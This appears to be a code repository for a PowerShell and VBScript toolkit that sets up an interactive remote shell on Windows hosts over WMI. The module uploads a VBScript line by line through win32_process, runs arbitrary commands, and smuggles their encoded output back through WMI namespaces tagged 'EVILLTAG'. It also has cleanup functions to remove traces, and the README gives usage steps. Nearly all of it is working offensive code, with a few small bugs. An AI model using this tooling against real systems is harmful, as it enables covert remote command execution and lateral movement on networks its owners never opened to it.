├── .gitattributes ├── Create-WMIshell.psm1 ├── README.md ├── base64.vbs └── hex.vbs /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | *.sln merge=union 7 | *.csproj merge=union 8 | *.vbproj merge=union 9 | *.fsproj merge=union 10 | *.dbproj merge=union 11 | 12 | # Standard to msysgit 13 | *.doc diff=astextplain 14 | *.DOC diff=astextplain 15 | *.docx diff=astextplain 16 | *.DOCX diff=astextplain 17 | *.dot diff=astextplain 18 | *.DOT diff=astextplain 19 | *.pdf diff=astextplain 20 | *.PDF diff=astextplain 21 | *.rtf diff=astextplain 22 | *.RTF diff=astextplain 23 | -------------------------------------------------------------------------------- /Create-WMIshell.psm1: -------------------------------------------------------------------------------- 1 | function New-WmiShell 2 | { 3 | <# 4 | .SYNOPSIS 5 | Setup interactive shell on a remote host leveraging the WMI service and a VBScript. 6 | 7 | Author: Jesse Davis (@secabstraction) 8 | License: BSD 3-Clause 9 | Required Dependencies: Base64/Hex encoding VBScript(s) 10 | 11 | .DESCRIPTION 12 | New-WmiShell tests connectivity with the WMI service and uploads a VBScript to the remote host(s). The uploaded 13 | VBScript will receive and execute shell commands via the WMI service and process the output of those commands. 14 | 15 | 16 | .PARAMETER ComputerName 17 | 18 | .PARAMETER UserName 19 | 20 | .PARAMETER UploadTo 21 | 22 | .PARAMETER Encoding 23 | 24 | 25 | .EXAMPLE 26 | PS C:\> New-WmiShell -ComputerName server01 -UserName 'DOMAIN\Administrator' -UploadTo %TEMP% -Encoding Base64 27 | 28 | 29 | .INPUTS 30 | 31 | .OUTPUTS 32 | 33 | .LINK 34 | #> 35 | 36 | [CmdLetBinding()] 37 | 38 | Param ( 39 | [Parameter(Mandatory = $True, 40 | ValueFromPipeline = $True, 41 | ValueFromPipelineByPropertyName = $True)] 42 | [string[]]$ComputerName, 43 | [Parameter()] 44 | [ValidateNotNull()] 45 | [System.Management.Automation.PSCredential] 46 | [System.Management.Automation.Credential()]$UserName = [System.Management.Automation.PSCredential]::Empty, 47 | [Parameter(Mandatory = $True)] 48 | [string]$UploadTo, 49 | [Parameter(Mandatory = $True)] 50 | [ValidateSet("Base64", "Hex")] 51 | [string]$Encoding 52 | ) #End Param 53 | 54 | BEGIN 55 | { 56 | 57 | #Store credentials for use on remote host(s) 58 | $creds = Get-Credential -Credential $UserName 59 | 60 | # Read VBScript into [] 61 | if ($Encoding -eq "Base64") { $vbscript = gc -Encoding UTF8 .\base64.vbs } 62 | 63 | else { $vbScript = gc -Encoding UTF8 .\hex.vbs } 64 | } 65 | 66 | PROCESS 67 | { 68 | $wmiOn = @() 69 | $wmiOff = @() 70 | 71 | foreach ($name in $ComputerName) 72 | { 73 | #Generate random name for VBScript 74 | $vbsName = [System.IO.Path]::GetRandomFileName() + ".vbs" 75 | 76 | #Grab some data about the host, validation of WMI accessibility 77 | $os = Get-WmiObject -ComputerName $name -Credential $creds -Class Win32_OperatingSystem 78 | $comp = Get-WmiObject -ComputerName $name -Credential $creds -Class Win32_ComputerSystem 79 | #$env = Get-WmiObject -Credential $creds -Class Win32_Environment -ComputerName $computer 80 | 81 | $props = @{ 82 | 'HostName' = $os.CSName; 83 | 'Maufacturer' = $comp.Manufacturer; 84 | 'Model' = $comp.Model; 85 | 'OS' = $os.Caption; 86 | 'OSVersion' = $os.Version; 87 | 'ServicePack' = $os.ServicePackMajorVerison; 88 | 'Workgroup' = $comp.Workgroup; 89 | 'PartOfDomain' = $comp.PartOfDomain; 90 | 'Domain' = $comp.Domain; 91 | 'OSArchitecture' = $os.OSArchitecture; 92 | 'SystemType' = $comp.SystemType; 93 | 'DEP_32BitApps' = $os.DataExecutionPrevention_32BitApplications; 94 | 'DEP_Available' = $os.DataExecutionPrevention_Available; 95 | 'DEP_Drivers' = $os.DataExecutionPrevention_Drivers; 96 | 'SystemDrive' = $os.SystemDrive; 97 | 'TotalPhysicalMemory' = $comp.TotalPhysicalMemory; 98 | 'Credentials' = $creds; 99 | 'vbsName' = $vbsName; 100 | 'vbsLocation' = $UploadTo; 101 | 'Encoding' = $Encoding; 102 | 'ComputerName' = $ComputerName; 103 | } 104 | $obj = New-Object -TypeName PSObject -Property $props 105 | 106 | if ($obj.ComputerName) { 107 | Write-Host -ForegroundColor Green "+ WMI is accessible on $($obj.ComputerName) +" 108 | $wmiOn += $obj 109 | } 110 | else { 111 | Write-Host -ForegroundColor Yellow "- WMI is not accessible on $($ComputerName) -" 112 | $wmiOff += $ComputerName 113 | } 114 | } 115 | 116 | foreach ($computer in $wmiOn) { 117 | 118 | #Upload VBScript to Host 119 | foreach ($line in $vbScript) { 120 | 121 | $argList = "cmd.exe /c echo $($line) >> $($computer.vbsLocation)\$($computer.vbsName)" 122 | Invoke-WmiMethod -ComputerName $computer.ComputerName -Credential $computer.Credentials -Class win32_process -Name create -ArgumentList $argList | Out-Null 123 | 124 | # Status-bar 125 | Write-Progress -Status "Please Wait..." -Activity "Uploading VBScript: $($computer.vbsName) to: $($computer.HostName) in $($UploadTo)" -PercentComplete (($line.ReadCount / $vbScript.Length) * 100) 126 | } 127 | 128 | #Validate functionality 129 | $cScript = "cmd.exe /c cscript.exe $($computer.vbsLocation)\$($computer.vbsName) `"whoami /priv`"" 130 | Invoke-WmiMethod -ComputerName $computer.ComputerName -Credential $computer.Credentials -Class win32_process -Name create -ArgumentList $cScript | Out-Null 131 | 132 | # Wait for vbScrpit to finish writing output to WMI namespaces 133 | $outputReady = "" 134 | do{$outputReady = Get-WmiObject -Namespace root\default -Query "SELECT Name FROM __Namespace WHERE Name like 'OUTPUT_READY'"} 135 | until($outputReady) 136 | 137 | Get-WmiShellOutput -UserName $computer.Credentials -ComputerName $computer.ComputerName -Encoding $computer.Encoding 138 | } 139 | } 140 | 141 | END { 142 | Write-Host -ForegroundColor Green "WMI Shells successfully setup on $($wmiOn.Length) host(s)" 143 | Write-Host -ForegroundColor Yellow "WMI Shells failed on $($wmiOff.Length) host(s)" 144 | $Global:WmiShells = $wmiOn 145 | } 146 | } Export-ModuleMember New-WmiShell 147 | 148 | function List-WmiShells 149 | { 150 | 151 | #[CmdLetBinding()] 152 | 153 | foreach($entry in $Global:WmiShells) { 154 | If ([BOOL]$entry.ReadCount) { 155 | Write-Host -ForegroundColor Cyan "Session $($entry.ReadCount) = $($entry.ComputerName)" 156 | } 157 | else {Write-Host -ForegroundColor Cyan "Session 0 = $($entry.ComputerName)"} 158 | } 159 | } Export-ModuleMember List-WmiShells 160 | 161 | function Get-WmiShellOutput 162 | { 163 | <# 164 | .SYNOPSIS 165 | Retrieves Base64 encdoded data from WMI namespaces. 166 | 167 | Author: Jesse Davis (@secabstraction) 168 | License: BSD 3-Clause 169 | Required Dependencies: Base64/Hex encoding VBScript(s) 170 | 171 | .DESCRIPTION 172 | Get-WmiShellOutput queries WMI for namespaces containing Base64 encdoded data that has been tagged for retrieval, 173 | retrieves the data, decodes it, and writes the decoded output to the console. 174 | 175 | 176 | .PARAMETER ComputerName 177 | 178 | .PARAMETER UserName 179 | 180 | .PARAMETER UploadTo 181 | 182 | .PARAMETER Encoding 183 | 184 | 185 | .EXAMPLE 186 | PS C:\> Get-WmiShellOutput -ComputerName server01 -UserName 'DOMAIN\Administrator' -UploadTo %TEMP% -Encoding Base64 187 | 188 | 189 | .INPUTS 190 | 191 | .OUTPUTS 192 | 193 | .LINK 194 | #> 195 | 196 | [CmdLetBinding()] 197 | 198 | Param ( 199 | [Parameter(Mandatory = $True, 200 | ValueFromPipeline = $True, 201 | ValueFromPipelineByPropertyName = $True)] 202 | [string[]]$ComputerName, 203 | [Parameter(ValueFromPipeline = $True, 204 | ValueFromPipelineByPropertyName = $True)] 205 | [ValidateNotNull()] 206 | [System.Management.Automation.PSCredential] 207 | [System.Management.Automation.Credential()]$UserName = [System.Management.Automation.PSCredential]::Empty, 208 | [Parameter(Mandatory = $True, 209 | ValueFromPipeline = $True, 210 | ValueFromPipelineByPropertyName = $True)] 211 | [ValidateSet("Base64", "Hex")] 212 | [string]$Encoding 213 | ) #End Param 214 | 215 | $getOutput = @() 216 | $getOutput = Get-WmiObject -Credential $UserName -ComputerName $ComputerName -Namespace root\default -Query "SELECT Name FROM __Namespace WHERE Name like 'EVILLTAG%'" | Select-Object Name 217 | 218 | if ([BOOL]$getOutput.Length) { 219 | 220 | #Read string objects into array, then sort them 221 | $getStrings = for ($i = 0; $i -lt $getOutput.Length; $i++) { $getOutput[$i].Name } 222 | $sortStrings = $getStrings | Sort-Object 223 | 224 | if ($Encoding -eq "Base64") { 225 | 226 | #Decode Base64 output 227 | foreach ($line in $sortStrings) { 228 | 229 | #Replace non-base64 characters 230 | $cleanString = $line.Remove(0, 14) -replace "`“", "+" -replace "Ã", "" -replace "_", "/" 231 | 232 | #Add necessary base64 padding characters 233 | if ($cleanString.Length % 4 -ne 0) { $cleanString += ("===").Substring(0, 4 - ($cleanString.Length % 4)) } 234 | 235 | # Decode base64 string and remove front side spaces 236 | $decodeString = ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cleanString)).Remove(0, 8)) 237 | 238 | # Remove back side spaces and compile output 239 | $decodedOutput += $decodeString.Remove(($decodeString.Length - 8), 8) 240 | } 241 | Write-Host $decodedOutput 242 | } 243 | else { 244 | 245 | #Decode Hex output 246 | foreach ($line in $sortStrings) { 247 | 248 | $cleanString = $line.Reomve(0, 15) 249 | $cleanString.Split(“_“) | foreach { Write-Host -object ([CHAR][BYTE]([CONVERT]::toint16($_, 16))) -NoNewline } 250 | } 251 | } 252 | 253 | } 254 | else { 255 | #Decode single line Base64 256 | if($Encoding -eq "Base64") { 257 | $getStrings = $getOutput.Name 258 | $cleanString = $getStrings.Remove(0, 14) -replace "`“", "+" -replace "Ã", "" -replace "_", "/" 259 | if ($cleanString.Length % 4 -ne 0) { $cleanString += ("===").Substring(0, 4 - ($cleanString.Length % 4)) } 260 | $decodedOutput = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cleanString)) } 261 | Write-Host $decodedOutput.Remove(0, 8) 262 | } 263 | #Decode single line Hex 264 | else { 265 | $getStrings = $getOutput.Name 266 | $cleanstring = $getStrings.Remove(0,15) 267 | $cleanString.Split(“_“) | foreach { Write-Host -object ([CHAR][BYTE]([CONVERT]::toint16($_, 16))) -NoNewline } 268 | } 269 | } Export-ModuleMember Get-WmiShellOutput 270 | 271 | function Enter-WmiShell 272 | { 273 | <# 274 | .SYNOPSIS 275 | Enter interactive WMI pseudo remote-shell. 276 | 277 | Author: Jesse Davis (@secabstraction) 278 | License: BSD 3-Clause 279 | Required Dependencies: New-WmiShell, Get-WmiShellOutput 280 | 281 | .DESCRIPTION 282 | Enter-WmiShell provides a cmd-prompt to interact with a remote-computer. 283 | 284 | .PARAMETER Session 285 | 286 | .PARAMETER ComputerName 287 | 288 | .PARAMETER UserName 289 | 290 | .PARAMETER UploadTo 291 | 292 | .PARAMETER Encoding 293 | 294 | 295 | .EXAMPLE 296 | PS C:\> Enter-WmiShell -Session 0 297 | 298 | .EXAMPLE 299 | PS C:\> Enter-WmiShell -ComputerName server01 -UserName 'DOMAIN\Administrator' -UploadTo %TEMP% -Encoding Base64 300 | 301 | 302 | .INPUTS 303 | 304 | .OUTPUTS 305 | 306 | .LINK 307 | #> 308 | 309 | [CmdLetBinding(DefaultParameterSetName = "set1")] 310 | 311 | Param ( 312 | [Parameter(ParameterSetName = "set1")] 313 | [string]$Session, 314 | [Parameter(ParameterSetName = "set2", 315 | Mandatory = $True, 316 | ValueFromPipeline = $True, 317 | ValueFromPipelineByPropertyName = $True)] 318 | [string[]]$ComputerName, 319 | [Parameter(ParameterSetName = "set2")] 320 | [ValidateNotNull()] 321 | [System.Management.Automation.PSCredential] 322 | [System.Management.Automation.Credential()]$UserName = [System.Management.Automation.PSCredential]::Empty, 323 | [Parameter(ParameterSetName = "set2", Mandatory = $True)] 324 | [string]$UploadTo, 325 | [Parameter(ParameterSetName = "set2", Mandatory = $True)] 326 | [string]$vbsName 327 | ) #End Param 328 | 329 | if ($PSBoundParameters['Session']) { 330 | $ComputerName = $Global:Wmishells[$Session].ComputerName 331 | $UserName = $Global:WmiShells[$Session].Credentials 332 | $UploadTo = $Global:WmiShells[$Session].vbsLocation 333 | $vbsName = $Global:WmiShells[$Session].vbsName 334 | $Encoding = $Global:Wmishells[$Session].Encoding 335 | } 336 | 337 | do{ 338 | # Make a pretty prompt for the user to provide commands at 339 | Write-Host ("[" + $($ComputerName) + "]: WmiShell>") -nonewline -foregroundcolor green -backgroundcolor black 340 | $command = Read-Host 341 | 342 | if ($command -eq "retry") { Get-WmiShellOutput -UserName $UserName -ComputerName $ComputerName -Encoding $Encoding } 343 | 344 | else { 345 | 346 | # Execute commands on remote host using cscript.exe and uploaded VBScript 347 | $cScript = "cmd.exe /c cscript.exe $($UploadTo)\$($vbsName) `"$($command)`"" 348 | Invoke-WmiMethod -ComputerName $ComputerName -Credential $UserName -Class win32_process -Name create -ArgumentList $cScript | Out-Null 349 | Start-Sleep -s 1 350 | 351 | if ($command -ne "exit") { 352 | 353 | # Wait for vbScrpit to finish writing output to WMI namespaces 354 | $outputReady = "" 355 | do{$outputReady = Get-WmiObject -Namespace root\default -Query "SELECT Name FROM __Namespace WHERE Name like 'OUTPUT_READY'"} 356 | until($outputReady) 357 | 358 | # Retrieve cmd output written to WMI namespaces 359 | Get-WmiShellOutput -UserName $UserName -ComputerName $ComputerName -Encoding $Encoding 360 | } 361 | } 362 | }until($command -eq "exit") 363 | } Export-ModuleMember Enter-WmiShell 364 | 365 | function Close-WmiShell 366 | { 367 | <# 368 | .SYNOPSIS 369 | Cleans up WMI shell artifacts. 370 | 371 | Author: Jesse Davis (@secabstraction) 372 | License: BSD 3-Clause 373 | Required Dependencies: 374 | 375 | .DESCRIPTION 376 | Close-WmiShell removes the VBScript(s) and any namespaces that have been written to by the WmiShell scripts. 377 | 378 | .PARAMETER Session 379 | 380 | .PARAMETER ComputerName 381 | 382 | .PARAMETER UserName 383 | 384 | .PARAMETER UploadTo 385 | 386 | .PARAMETER Encoding 387 | 388 | 389 | .EXAMPLE 390 | PS C:\> Close-WmiShell -Session 0 391 | 392 | .EXAMPLE 393 | PS C:\> Close-WmiShell -All 394 | 395 | .EXAMPLE 396 | PS C:\> Close-WmiShell -ComputerName server01 -UserName 'DOMAIN\Administrator' -UploadTo %TEMP% -Encoding Base64 397 | 398 | 399 | .INPUTS 400 | 401 | .OUTPUTS 402 | 403 | .LINK 404 | #> 405 | 406 | [CmdLetBinding(DefaultParameterSetName = "set1")] 407 | 408 | Param ( 409 | [Parameter(ParameterSetName = "set1")] 410 | [ValidatePattern('^\d+$')] 411 | [string]$Session, 412 | [Parameter(ParameterSetName = "set2")] 413 | [Switch]$All, 414 | [Parameter(ParameterSetName = "set3", 415 | Mandatory = $True, 416 | ValueFromPipeline = $True, 417 | ValueFromPipelineByPropertyName = $True)] 418 | [string[]]$ComputerName, 419 | [Parameter(ParameterSetName = "set3")] 420 | [ValidateNotNull()] 421 | [System.Management.Automation.PSCredential] 422 | [System.Management.Automation.Credential()]$UserName = [System.Management.Automation.PSCredential]::Empty, 423 | [Parameter(ParameterSetName = "set3", Mandatory = $True)] 424 | [string]$UploadTo, 425 | [Parameter(ParameterSetName = "set3", Mandatory = $True)] 426 | [string]$vbsName 427 | ) #End Param 428 | 429 | if ($PSBoundParameters['Session']) { 430 | $ComputerName = $Global:Wmishells[$Session].ComputerName 431 | $UserName = $Global:WmiShells[$Session].Credentials 432 | $UploadTo = $Global:WmiShells[$Session].vbsLocation 433 | $vbsName = $Global:WmiShells[$Session].vbsName 434 | $Encoding = $Global:Wmishells[$Session].Encoding 435 | } 436 | elseif ($All) { 437 | foreach ($obj in $Global:Wmishells) { 438 | $cScript = "cmd.exe /c del $($obj.vbsLocation)\$($obj.vbsName)" 439 | Invoke-WmiMethod -ComputerName $obj.ComputerName -Credential $obj.Credentials -Class win32_process -Name create -ArgumentList $cScript | Out-Null 440 | } 441 | } 442 | 443 | $cScript = "cmd.exe /c del $($UploadTo)\$($vbsName)" 444 | Invoke-WmiMethod -ComputerName $ComputerName -Credential $UserName -Class win32_process -Name create -ArgumentList $cScript | Out-Null 445 | } Export-ModuleMember Close-WmiShell 446 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Getting Started 2 | =============== 3 | 1. Navigate to the directory containing Create-WmiShell.psm1 and the 2 VB scripts 4 | 2. Import-Module .\Create-WmiShell.psm1 5 | 3. New-WmiShell -ComputerName -UserName -UploadTo -Encoding 6 | 4. List-WmiShells 7 | 5. Enter-WmiShell -Session <# from List-WmiShells> 8 | 9 | When creating a new wmishell, you can start powershell with the runas.exe command and skip the -UserName parameter. 10 | 11 | TODOs 12 | =============== 13 | 1. Test functionality against (multiple) target host file 14 | 2. Better implementation of List-WmiShells function 15 | 3. Test Close-WmiShell function 16 | -------------------------------------------------------------------------------- /base64.vbs: -------------------------------------------------------------------------------- 1 | Function encode(byVal strIn) 2 | Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" 3 | Dim w1, w2, w3, i, totalLen, strOut 4 | totalLen = Len(strIn) 5 | If Not ((totalLen Mod 3) = 0) Then totalLen = totalLen + 3 - (totalLen Mod 3) 6 | For i = 1 To totalLen Step 3 7 | w1 = prepare( Mid( strIn, i, 1 ) ) 8 | w2 = prepare( Mid( strIn, i + 1, 1 ) ) 9 | w3 = prepare( Mid( strIn, i + 2, 1 ) ) 10 | strOut = strOut + Mid( Base64Chars, ( Int( w1 / 4 ) And 63 ) + 1 , 1 ) 11 | strOut = strOut + Mid( Base64Chars, ( ( w1 * 16 + Int( w2 / 16 ) ) And 63 ) + 1, 1 ) 12 | If (w2 Or w3) Then 13 | strOut = strOut + Mid( Base64Chars, ( ( w2 * 4 + Int( w3 / 64 ) ) And 63 ) + 1, 1 ) 14 | If w3 Then 15 | strOut = strOut + Mid( Base64Chars, (w3 And 63 ) + 1, 1) 16 | End If 17 | End If 18 | Next 19 | encode = strOut 20 | End Function 21 | Function prepare( byVal strIn ) 22 | If Len( strIn ) = 0 Then 23 | prepare = 0 : Exit Function 24 | Else 25 | prepare = Asc(strIn) 26 | End If 27 | End Function 28 | Function parseCmdOutput(cmdOutput) 29 | strLen = Len(cmdOutput) 30 | pieceLen = 5500 31 | nbOfPieces = Int(strLen/pieceLen) 32 | For i = 1 to nbOfPieces 33 | piece = Left(cmdOutput,pieceLen) 34 | piece = " " + piece + " " 35 | cmdOutput = Mid(cmdOutput,pieceLen+1) 36 | insertPiece i,piece 37 | Next 38 | cmdOutput = " " + cmdOutput + " " 39 | insertPiece nbOfPieces+1,cmdOutput 40 | End Function 41 | Function insertPiece(ByVal number,ByVal piece) 42 | count = CStr(number) 43 | zeros = String(6 - Len(count), "0") 44 | tag = "EVILLTAG" + zeros + count 45 | piece = encode(piece) 46 | piece = Replace(piece,"+","Ó") 47 | piece = Replace(piece,"/","_") 48 | piece = tag + piece 49 | Set aShell = CreateObject("WScript.Shell") 50 | aShell.Exec("wmic /NAMESPACE:\\root\default PATH __Namespace CREATE Name='" + piece + "'") 51 | WScript.Sleep 50 52 | End Function 53 | Set myShell = CreateObject("WScript.Shell") 54 | tmpDir = myShell.ExpandEnvironmentStrings("%TEMP%") 55 | Select Case WScript.Arguments.Item(0) 56 | Case "exit" 57 | myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like 'OUTPUT_READY'"" delete") 58 | myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like '%EVILLTAG%'"" delete") 59 | Case Else 60 | myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like 'OUTPUT_READY'"" delete") 61 | myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like '%EVILLTAG%'"" delete") 62 | set cmdExecution = myShell.exec("%comspec% /c " + WScript.Arguments.Item(0)) 63 | cmdOutput = cmdExecution.StdOut.ReadAll 64 | parseCmdOutput cmdOutput 65 | myShell.Exec("wmic /NAMESPACE:\\root\default PATH __Namespace CREATE Name='OUTPUT_READY'") 66 | End Select 67 | -------------------------------------------------------------------------------- /hex.vbs: -------------------------------------------------------------------------------- 1 | function hexEn(str) 2 | dim strEncoded, i 3 | strEncoded = "" 4 | for i = 1 to Len(str) 5 | strEncoded = strEncoded + "_" + Hex(Asc(Mid(str, i, 1))) 6 | next 7 | hexEn = strEncoded 8 | End function 9 | Function parseCmdOutput(cmdOutput) 10 | strLen = Len(cmdOutput) 11 | pieceLen = 2500 12 | nbOfPieces = Int(strLen/pieceLen) 13 | For i = 1 to nbOfPieces 14 | piece = Left(cmdOutput,pieceLen) 15 | piece = " " + piece + " " 16 | cmdOutput = Mid(cmdOutput,pieceLen+1) 17 | insertPiece i,piece 18 | Next 19 | cmdOutput = " " + cmdOutput + " " 20 | insertPiece nbOfPieces+1,cmdOutput 21 | End Function 22 | function insertPiece(ByVal number,ByVal piece) 23 | count = CStr(number) 24 | zeros = String(6 - Len(count), "0") 25 | tag = "EVILLTAG" + zeros + count 26 | piece = hexEn(piece) 27 | piece = tag + piece 28 | Set aShell = CreateObject("WScript.Shell") 29 | aShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace CREATE Name='" + piece + "'") 30 | WScript.Sleep 50 31 | End function 32 | Set myShell = CreateObject("WScript.Shell") 33 | tmpDir = myShell.ExpandEnvironmentStrings("%TEMP%") 34 | Select Case WScript.Arguments.Item(0) 35 | Case "exit" 36 | myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like 'OUTPUT_READY'"" delete") 37 | myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like '%EVILLTAG%'"" delete") 38 | Case Else 39 | myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like 'OUTPUT_READY'"" delete") 40 | myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace where ""Name like '%EVILLTAG%'"" delete") 41 | set cmdExecution = myShell.exec("%comspec% /c " + WScript.Arguments.Item(0)) 42 | cmdOutput = cmdExecution.StdOut.ReadAll 43 | parseCmdOutput cmdOutput 44 | myShell.Exec("wmic.exe /NAMESPACE:\\root\default PATH __Namespace CREATE Name='OUTPUT_READY'") 45 | End Select 46 | --------------------------------------------------------------------------------